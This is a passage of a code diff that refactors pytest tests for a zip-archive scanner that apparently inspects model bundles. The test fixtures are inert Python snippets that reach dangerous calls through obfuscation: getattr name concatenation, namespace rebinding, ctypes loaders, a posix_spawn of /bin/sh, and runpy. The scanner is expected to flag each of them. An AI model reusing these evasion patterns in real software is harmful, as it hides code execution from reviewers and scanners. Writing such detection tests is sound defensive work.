python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_python_member_warning( + tmp_path, + ("from subprocess import run\nrun('echo hidden', shell=True)\n"), + ("reason"), + ("high-risk calls: subprocess.run"), + ) def test_scan_zip_flags_wildcard_import_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", "from subprocess import *\nrun(['echo', 'hidden'], check=False)\n") - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_python_member_warning( + tmp_path, + ("from subprocess import *\nrun(['echo', 'hidden'], check=False)\n"), + ("reason"), + ("high-risk calls: subprocess.run"), + ) def test_scan_zip_preserves_subprocess_after_asyncio_wildcard_import(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import subprocess\nfrom asyncio import *\nsubprocess.run(['echo', 'hidden'], check=False)\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].details["reason"] == "high-risk calls: subprocess.run" + _assert_zip_subprocess_warning( + tmp_path, ("import subprocess\nfrom asyncio import *\nsubprocess.run(['echo', 'hidden'], check=False)\n") + ) def test_scan_zip_flags_builtins_getattr_call_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import builtins as bi\nimport os\nbi.getattr(os, 'system').__call__('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + _assert_zip_system_call( + tmp_path, ("import builtins as bi\nimport os\nbi.getattr(os, 'system').__call__('echo hidden')\n") + ) def test_scan_zip_flags_aliased_getattr_helper_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "from builtins import getattr as resolve\n" - "import os as operating_system\n" - "resolve(operating_system, 'system')('echo hidden')\n" + _assert_zip_system_call( + tmp_path, + ( + "from builtins import getattr as resolve\n" + "import os as operating_system\n" + "resolve(operating_system, 'system')('echo hidden')\n" + ), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" def test_scan_zip_flags_concatenated_getattr_name_dangerous_python_member(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import os\ngetattr(os, 'sys' + 'tem')('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].severity == IssueSeverity.WARNING - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.system" + _assert_zip_system_call(tmp_path, ("import os\ngetattr(os, 'sys' + 'tem')('echo hidden')\n")) @pytest.mark.parametrize( @@ -469,10 +382,7 @@ def test_scan_zip_flags_concatenated_getattr_name_dangerous_python_member(tmp_pa ) def test_scan_zip_flags_namespace_mapping_dangerous_python_member(tmp_path: Path, source: str) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -488,19 +398,7 @@ def test_scan_zip_flags_namespace_mapping_dangerous_python_member(tmp_path: Path def test_scan_zip_reports_rebound_namespace_callable_target(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import os\nos.__dict__['system'] = vars\nos.__dict__['system'](os)['popen']('echo hidden')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.popen" + _assert_zip_python_finding_at_path(archive_path, source, "S101", "high-risk calls: os.popen") def test_scan_zip_flags_namespace_bound_os_process_launch(tmp_path: Path) -> None: @@ -511,19 +409,7 @@ def test_scan_zip_flags_namespace_bound_os_process_launch(tmp_path: Path) -> Non "namespace['launch'] = os.posix_spawn\n" "namespace['launch']('/bin/sh', ['sh'], {})\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S101" - assert python_checks[0].details["reason"] == "high-risk calls: os.posix_spawn" + _assert_zip_python_finding_at_path(archive_path, source, "S101", "high-risk calls: os.posix_spawn") @pytest.mark.parametrize( @@ -549,19 +435,7 @@ def test_scan_zip_flags_namespace_bound_os_process_launch(tmp_path: Path) -> Non ) def test_scan_zip_flags_asyncio_subprocess_python_member(tmp_path: Path, source: str, dangerous_name: str) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S103" - assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" + _assert_zip_python_finding_at_path(archive_path, source, "S103", f"high-risk calls: {dangerous_name}") @pytest.mark.parametrize( @@ -576,19 +450,7 @@ def test_scan_zip_flags_asyncio_subprocess_python_member(tmp_path: Path, source: ) def test_scan_zip_flags_runpy_execution_python_member(tmp_path: Path, source: str, dangerous_name: str) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" + _assert_zip_python_finding_at_path(archive_path, source, "S108", f"high-risk calls: {dangerous_name}") @pytest.mark.parametrize( @@ -609,19 +471,7 @@ def test_scan_zip_flags_direct_imported_python_member_primitives( ) -> None: archive_path = tmp_path / "model_bundle.zip" source = source.replace("LIBRARY_PATH", repr(str(tmp_path / "libpayload.so"))) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == rule_code - assert python_checks[0].details["reason"] == f"high-risk calls: {dangerous_name}" + _assert_zip_python_finding_at_path(archive_path, source, rule_code, f"high-risk calls: {dangerous_name}") def test_scan_zip_flags_webbrowser_and_ctypes_python_member(tmp_path: Path) -> None: @@ -710,10 +560,7 @@ def test_scan_zip_flags_webbrowser_and_ctypes_python_member(tmp_path: Path) -> N " __init__ = ctypes.CDLL.__init__\n" "ctypes.LibraryLoader(ClassBodyInitCDLL).classbodyinitlib\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -768,46 +615,23 @@ def test_scan_zip_flags_webbrowser_and_ctypes_python_member(tmp_path: Path) -> N def test_scan_zip_flags_unbound_libraryloader_accessor_dispatch(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" - "type(loader).__getattr__(loader, 'typegetattr')\n" - "loader.__class__.__getitem__(loader, 'classgetitem')\n" + _assert_loader_accessors( + tmp_path, + ( + "import ctypes\n" + "loader = ctypes.LibraryLoader(ctypes.CDLL)\n" + "type(loader).__getattr__(loader, 'typegetattr')\n" + "loader.__class__.__getitem__(loader, 'classgetitem')\n" + ), + ("ctypes.LibraryLoader.typegetattr"), + ("ctypes.LibraryLoader.classgetitem"), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - checks_by_rule = {check.rule_code: check for check in python_checks} - assert set(checks_by_rule) == {"S110"} - s110_reason = checks_by_rule["S110"].details["reason"] - assert "ctypes.LibraryLoader.typegetattr" in s110_reason - assert "ctypes.LibraryLoader.classgetitem" in s110_reason def test_scan_zip_flags_webbrowser_controller_getattribute_launch(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import webbrowser\nwebbrowser.get().__getattribute__('open')('https://example.invalid')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S109" - assert python_checks[0].details["reason"] == "high-risk calls: webbrowser.open" + _assert_zip_python_finding_at_path(archive_path, source, "S109", "high-risk calls: webbrowser.open") def test_scan_zip_handles_final_dynamic_accessor_edges(tmp_path: Path) -> None: @@ -829,10 +653,7 @@ def test_scan_zip_handles_final_dynamic_accessor_edges(tmp_path: Path) -> None: "hasattr(ctypes.LibraryLoader(ctypes.CDLL), 'hasattremptykwargs', **{})\n" "ctypes.LibraryLoader.__getattr__(ctypes.cdll, 'unboundgetattr')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -860,60 +681,32 @@ def test_scan_zip_flags_class_rebound_inert_libraryloader(tmp_path: Path) -> Non "del loader._dlltype\n" "loader.payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) + _assert_zip_python_finding_at_path(archive_path, source, "S110", "high-risk calls: ctypes.LibraryLoader.payload") - result = ZipScanner().scan(str(archive_path)) - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S110" - assert python_checks[0].details["reason"] == "high-risk calls: ctypes.LibraryLoader.payload" +def test_scan_zip_ignores_safe_class_rebound_inert_libraryloader(tmp_path: Path) -> None: + _assert_zip_without_rule( + tmp_path, + ( + "import ctypes\n" + "loader = ctypes.LibraryLoader(len)\n" + "loader.__class__._dlltype = len\n" + "del loader._dlltype\n" + "loader.payload\n" + ), + ("S110"), + ) -def test_scan_zip_ignores_safe_class_rebound_inert_libraryloader(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "loader = ctypes.LibraryLoader(len)\n" - "loader.__class__._dlltype = len\n" - "del loader._dlltype\n" - "loader.payload\n" - ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - for check in result.checks - ) - - -def test_scan_zip_ignores_shadowed_type_module_class_accessor(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = "import runpy\ntype = len\ntype(runpy).__getattribute__(runpy, 'run_path')('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) - - -def test_scan_zip_honors_safe_dynamic_member_aliases_and_method_overwrites(tmp_path: Path) -> None: +def test_scan_zip_ignores_shadowed_type_module_class_accessor(tmp_path: Path) -> None: + _assert_zip_without_rule( + tmp_path, + ("import runpy\ntype = len\ntype(runpy).__getattribute__(runpy, 'run_path')('payload.py')\n"), + ("S108"), + ) + + +def test_scan_zip_honors_safe_dynamic_member_aliases_and_method_overwrites(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = ( "import ctypes\n" @@ -932,10 +725,7 @@ def test_scan_zip_honors_safe_dynamic_member_aliases_and_method_overwrites(tmp_p "method_loader.LoadLibrary = len\n" "method_loader.LoadLibrary([])\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") assert result.success is True assert not any( @@ -963,10 +753,7 @@ def test_scan_zip_resolves_final_ctypes_initializer_edges(tmp_path: Path) -> Non " super(Safe, self).__init__(name)\n" "ctypes.LibraryLoader(SuperSkipCDLL).superskiplib\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -982,32 +769,24 @@ def test_scan_zip_resolves_final_ctypes_initializer_edges(tmp_path: Path) -> Non def test_scan_zip_ignores_invalid_ctypes_initializer_delegates(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "class MissingNameCDLL(ctypes.CDLL):\n" - " def __init__(self, name: str) -> None:\n" - " super().__init__()\n" - "ctypes.LibraryLoader(MissingNameCDLL).payload\n" - "class DirectMissingNameCDLL(ctypes.CDLL):\n" - " def __init__(self, name: str) -> None:\n" - " ctypes.CDLL.__init__(self)\n" - "ctypes.LibraryLoader(DirectMissingNameCDLL).payload\n" - "class WrongSelfCDLL(ctypes.CDLL):\n" - " def __init__(self, name: str) -> None:\n" - " ctypes.CDLL.__init__(object(), name)\n" - "ctypes.LibraryLoader(WrongSelfCDLL).payload\n" - ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - for check in result.checks + _assert_zip_without_rule( + tmp_path, + ( + "import ctypes\n" + "class MissingNameCDLL(ctypes.CDLL):\n" + " def __init__(self, name: str) -> None:\n" + " super().__init__()\n" + "ctypes.LibraryLoader(MissingNameCDLL).payload\n" + "class DirectMissingNameCDLL(ctypes.CDLL):\n" + " def __init__(self, name: str) -> None:\n" + " ctypes.CDLL.__init__(self)\n" + "ctypes.LibraryLoader(DirectMissingNameCDLL).payload\n" + "class WrongSelfCDLL(ctypes.CDLL):\n" + " def __init__(self, name: str) -> None:\n" + " ctypes.CDLL.__init__(object(), name)\n" + "ctypes.LibraryLoader(WrongSelfCDLL).payload\n" + ), + ("S110"), ) @@ -1025,10 +804,7 @@ def test_scan_zip_restores_dynamic_member_defaults_after_namespace_rebinds(tmp_p "globals().update(browser=webbrowser.get())\n" "browser.open('https://example.invalid')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1055,14 +831,7 @@ def test_scan_zip_keeps_dynamic_member_deletes_child_scope_local(tmp_path: Path) "ctypes.windll.payload\n" "browser.open([])\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert not any( - check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks - ) + _assert_zip_python_member_safe_at_path(archive_path, source) def test_scan_zip_flags_empty_kwargs_loader_constructor_and_current_super(tmp_path: Path) -> None: @@ -1084,10 +853,7 @@ def test_scan_zip_flags_empty_kwargs_loader_constructor_and_current_super(tmp_pa " super(CurrentSuperCDLL, self).__init__(name)\n" "ctypes.LibraryLoader(CurrentSuperCDLL).currentsuperlib\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1115,10 +881,7 @@ def test_scan_zip_resolves_initializer_delete_before_class_alias_fallback(tmp_pa " self.init(name)\n" "ctypes.LibraryLoader(DeletedShadowCDLL).deletedshadowlib\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1131,35 +894,24 @@ def test_scan_zip_resolves_initializer_delete_before_class_alias_fallback(tmp_pa def test_scan_zip_resolves_imports_inside_ctypes_subclass_initializers(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "class ImportAliasCDLL(ctypes.CDLL):\n" - " def __init__(self, name: str) -> None:\n" - " import ctypes as ct\n" - " ct.CDLL.__init__(self, name)\n" - "ctypes.LibraryLoader(ImportAliasCDLL).importaliaslib\n" - "class FromImportCDLL(ctypes.CDLL):\n" - " def __init__(self, name: str) -> None:\n" - " from ctypes import CDLL\n" - " CDLL.__init__(self, name)\n" - "ctypes.LibraryLoader(FromImportCDLL).fromimportlib\n" + _assert_loader_accessors( + tmp_path, + ( + "import ctypes\n" + "class ImportAliasCDLL(ctypes.CDLL):\n" + " def __init__(self, name: str) -> None:\n" + " import ctypes as ct\n" + " ct.CDLL.__init__(self, name)\n" + "ctypes.LibraryLoader(ImportAliasCDLL).importaliaslib\n" + "class FromImportCDLL(ctypes.CDLL):\n" + " def __init__(self, name: str) -> None:\n" + " from ctypes import CDLL\n" + " CDLL.__init__(self, name)\n" + "ctypes.LibraryLoader(FromImportCDLL).fromimportlib\n" + ), + ("ctypes.LibraryLoader.importaliaslib"), + ("ctypes.LibraryLoader.fromimportlib"), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - checks_by_rule = {check.rule_code: check for check in python_checks} - assert set(checks_by_rule) == {"S110"} - s110_reason = checks_by_rule["S110"].details["reason"] - assert "ctypes.LibraryLoader.importaliaslib" in s110_reason - assert "ctypes.LibraryLoader.fromimportlib" in s110_reason def test_scan_zip_ignores_unreachable_new_returns_async_init_and_hasattr_alias(tmp_path: Path) -> None: @@ -1254,10 +1006,7 @@ def test_scan_zip_ignores_unreachable_new_returns_async_init_and_hasattr_alias(t "f = hasattr(os, 'system')\n" "f('id')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1314,10 +1063,7 @@ def test_scan_zip_resolves_static_ctypes_initializer_call_forms(tmp_path: Path) " return super().__new__(cls)\n" "ctypes.LibraryLoader(PartialNewCDLL).partialnewlib\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1339,10 +1085,7 @@ def test_scan_zip_resolves_static_ctypes_initializer_call_forms(tmp_path: Path) def test_scan_zip_flags_extensionless_runpy_python_member(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler", "import runpy\nrunpy.run_module('payload')\n") - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, "import runpy\nrunpy.run_module('payload')\n", "handler") python_checks = [ check @@ -1356,10 +1099,7 @@ def test_scan_zip_flags_extensionless_runpy_python_member(tmp_path: Path) -> Non def test_scan_zip_ignores_extensionless_runpy_near_match(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("notes", "documentation mentions runpy.run_module('payload')\n") - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, "documentation mentions runpy.run_module('payload')\n", "notes") assert not any( check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED for check in result.checks @@ -1369,37 +1109,13 @@ def test_scan_zip_ignores_extensionless_runpy_near_match(tmp_path: Path) -> None def test_scan_zip_preserves_possible_runpy_execution_after_conditional_overwrite(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy\nif replace:\n runpy.run_path = len\nrunpy.run_path('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") def test_scan_zip_preserves_possible_runpy_execution_after_forwarded_conditional_overwrite(tmp_path: Path) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import runpy as rp\nmod = rp\nif replace:\n mod.run_path = len\nrp.run_path('payload.py')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S108" - assert python_checks[0].details["reason"] == "high-risk calls: runpy.run_path" + _assert_zip_python_finding_at_path(archive_path, source, "S108", "high-risk calls: runpy.run_path") @pytest.mark.parametrize( @@ -1482,18 +1198,7 @@ def test_scan_zip_ignores_proven_safe_runpy_late_state(tmp_path: Path, safe_stat def test_scan_zip_preserves_boolean_fallback_risk_after_builtin_mutation( tmp_path: Path, source: str, rule_code: str ) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == rule_code - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, rule_code) @pytest.mark.parametrize( @@ -1510,45 +1215,24 @@ def test_scan_zip_preserves_boolean_fallback_risk_after_builtin_mutation( ], ) def test_scan_zip_preserves_runpy_risk_after_non_executed_shadow(tmp_path: Path, source: str) -> None: - archive_path = tmp_path / "model_bundle.zip" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S108" - for check in result.checks - ) + _assert_zip_python_rule(tmp_path, source, "S108") def test_scan_zip_preserves_dynamic_member_risk_after_conditional_overwrite(tmp_path: Path) -> None: - archive_path = tmp_path / "model_bundle.zip" - source = ( - "import ctypes\n" - "import webbrowser\n" - "browser = webbrowser.get()\n" - "if replace:\n" - " browser.open = len\n" - " ctypes.windll.kernel32 = len\n" - "browser.open('https://example.invalid')\n" - "ctypes.windll.kernel32\n" + _assert_conditional_member_risk( + tmp_path, + ( + "import ctypes\n" + "import webbrowser\n" + "browser = webbrowser.get()\n" + "if replace:\n" + " browser.open = len\n" + " ctypes.windll.kernel32 = len\n" + "browser.open('https://example.invalid')\n" + "ctypes.windll.kernel32\n" + ), + ("high-risk calls: ctypes.windll.kernel32"), ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - checks_by_rule = {check.rule_code: check for check in python_checks} - assert checks_by_rule["S109"].details["reason"] == "high-risk calls: webbrowser.open" - assert checks_by_rule["S110"].details["reason"] == "high-risk calls: ctypes.windll.kernel32" @pytest.mark.parametrize( @@ -1601,17 +1285,7 @@ def test_scan_zip_preserves_dynamic_member_risk_after_conditional_overwrite(tmp_ def test_scan_zip_preserves_ctypes_risk_after_qualified_control_target(tmp_path: Path, mutation: str) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import ctypes as c\n" + mutation + "loader = c.CDLL\nloader('libpayload.so')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - assert any( - check.name == "Python Archive Member Security" - and check.status == CheckStatus.FAILED - and check.rule_code == "S110" - for check in result.checks - ) + _assert_zip_python_rule_at_path(archive_path, source, "S110") @pytest.mark.parametrize( @@ -1632,10 +1306,7 @@ def test_scan_zip_preserves_ctypes_risk_after_qualified_control_target(tmp_path: def test_scan_zip_preserves_safe_final_qualified_control_target(tmp_path: Path, mutation: str) -> None: archive_path = tmp_path / "model_bundle.zip" source = "import ctypes as c\n" + mutation + "loader = c.CDLL\nloader('safe')\n" - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") assert not any( check.name == "Python Archive Member Security" @@ -1655,10 +1326,7 @@ def test_scan_zip_flags_ctypes_getattr_dynamic_library_name(tmp_path: Path) -> N "ctypes.windll.__getattr__(name)\n" "loader.__getattr__(name)\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1685,10 +1353,7 @@ def test_scan_zip_flags_unpacked_getattr_and_unbound_loader_getattr(tmp_path: Pa "ctypes.LibraryLoader.__getattr__(ctypes.cdll, 'advapi32')\n" "ctypes.LibraryLoader.__getattr__(*(ctypes.windll, 'kernel32'))\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) + result = _scan_python_zip_member(archive_path, source, "handler.py") python_checks = [ check @@ -1715,19 +1380,7 @@ def test_scan_zip_preserves_library_loader_member_risk_after_other_instance_over "live_loader = ctypes.LibraryLoader(ctypes.CDLL)\n" "live_loader.payload\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S110" - assert python_checks[0].details["reason"] == "high-risk calls: ctypes.LibraryLoader.payload" + _assert_zip_python_finding_at_path(archive_path, source, "S110", "high-risk calls: ctypes.LibraryLoader.payload") def test_scan_zip_preserves_webbrowser_controller_member_risk_after_other_instance_overwrite( @@ -1741,19 +1394,7 @@ def test_scan_zip_preserves_webbrowser_controller_member_risk_after_other_instan "other = webbrowser.get('other')\n" "other.open('https://example.invalid')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) - - result = ZipScanner().scan(str(archive_path)) - - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S109" - assert python_checks[0].details["reason"] == "high-risk calls: webbrowser.open" + _assert_zip_python_finding_at_path(archive_path, source, "S109", "high-risk calls: webbrowser.open") def test_scan_zip_preserves_webbrowser_member_risk_after_other_controller_overwrite(tmp_path: Path) -> None: @@ -1764,56 +1405,34 @@ def test_scan_zip_preserves_webbrowser_member_risk_after_other_controller_overwr "safe_browser.open = len\n" "webbrowser.get('other').open('https://example.invalid')\n" ) - with zipfile.ZipFile(archive_path, "w") as archive: - archive.writestr("handler.py", source) + _assert_zip_python_finding_at_path(archive_path, source, "S109", "high-risk calls: webbrowser.open") - result = ZipScanner().scan(str(archive_path)) - python_checks = [ - check - for check in result.checks - if check.name == "Python Archive Member Security" and check.status == CheckStatus.FAILED - ] - assert len(python_checks) == 1 - assert python_checks[0].rule_code == "S109" - assert python_checks[0].details["reason"] == "high-risk calls: webbrowser.open" +def test_scan_zip_preserves_dynamic_member_risk_after_same_name_reassignment(tmp_path: Path) -> None: + _assert_conditional_member_risk( + tmp_path, + ( + "import ctypes\n" + "import 